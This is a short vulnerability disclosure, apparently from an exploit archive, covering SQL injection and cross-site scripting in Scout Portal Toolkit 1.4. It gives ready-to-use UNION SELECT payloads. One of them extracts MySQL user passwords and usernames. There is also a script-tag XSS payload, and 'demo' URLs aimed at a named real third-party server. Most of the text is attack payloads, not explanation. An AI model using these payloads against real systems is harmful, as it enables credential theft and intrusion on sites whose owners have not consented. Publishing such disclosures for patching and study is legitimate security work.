The Scout Portal Toolkit version 1.4 suffers from cross site scripting and SQL injection vulnerabilities. The SQL injection vulnerability was already previously discovered in May of 2008.
14f901b8058e4c69671750adba1d4df98618baa6973d8c4082742eb36b4d3b76
.-----------------------------------------------------------------------------------------------
.The Scout Portal Toolkit V1.4 - xss/sql injection Vulnerability
.
.-------------------------------------------------------------------------------------
.(BrowseResources.php?ParentId=) SQL Injection
.
.(QuickSearch.php?ss=) Cross Site Scripting - XSS
.
.Project: - https://scout.wisc.edu/Projects/SPT/
.-------------------------------------------------------------------------------------
.Bug founded by d3v1l [Avram Marius] - d3v1l@spoofer.com
.
.gR33TZ to all Security-Sh3ll staff/members
.-------------------------------------------------------------------------------------
.Poc-Exploit: -
.
.
.-1 UNION SELECT concat(password,char(58),user) FROM mysql.user LIMIT 1,1/*
.
.-1 UNION SELECT concat_ws(0x3a,version(),database(),user()) LIMIT 1,1/*
.-------------------------------------------------------------------------------------
.Demo: -
.
.
.
https://walton.rockcluster.brown.edu/SPT/SPT--BrowseResources.php?ParentId=SQL
--------------------------------------------------------------------------------------
.XSS:-
.
.https://walton.rockcluster.brown.edu/SPT/SPT--QuickSearch.php?ss=
"><script>alert(/XSS/)</script>
.------------------------------------------------------------------------------------------------